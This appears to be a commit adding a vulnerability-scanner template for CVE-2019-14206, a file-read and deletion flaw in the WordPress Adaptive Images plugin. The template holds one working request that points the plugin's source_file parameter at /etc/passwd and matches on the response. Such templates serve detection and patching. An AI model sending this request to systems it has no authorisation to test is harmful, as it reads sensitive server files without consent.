add template: CVE-2019-14206 WordPress Adaptive Images

http/cves/2019/CVE-2019-14206.yaml

@@ -0,0 +1,41 @@
+id: CVE-2019-14206
+
+info:
+  name: WordPress Nevma Adaptive Images <0.6.67 - Arbitrary File Deletion / LFI
+  author: cascade
+  severity: high
+  description: |
+    The WordPress Nevma Adaptive Images plugin before 0.6.67 contains unsafe handling of user input in adaptive-images-script.php, enabling arbitrary file deletion and file read. An attacker can control the path used by the cache mechanism and read sensitive files (e.g., /etc/passwd) or delete arbitrary files.
+  impact: |
+    Successful exploitation can read sensitive files or delete arbitrary files accessible to the web server user, leading to information disclosure, denial of service, or further compromise.
+  remediation: |
+    Update the plugin to version 0.6.67 or later where input sanitization was added.
+  reference:
+    - https://markgruffer.github.io/2019/07/19/adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.html
+    - https://github.com/markgruffer/markgruffer.github.io/blob/master/_posts/2019-07-19-adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.markdown
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-14206
+  classification:
+    cve-id: CVE-2019-14206
+    cwe-id: CWE-22
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
+    cvss-score: 9.1
+    epss-score: 0.04139
+    epss-percentile: 0.91415
+    cpe: cpe:2.3:a:nevma:adaptive_images:*:*:*:*:*:wordpress:*:*
+  metadata:
+    max-request: 1
+    verified: true
+  tags: cve,cve2019,wordpress,wp-plugin,lfi,wp,adaptive-images
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=/etc/passwd"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "regex('root:.*:0:0:', body)"
+          - 'contains(body, "adaptive-images")'
+          - "status_code == 200"
+        condition: and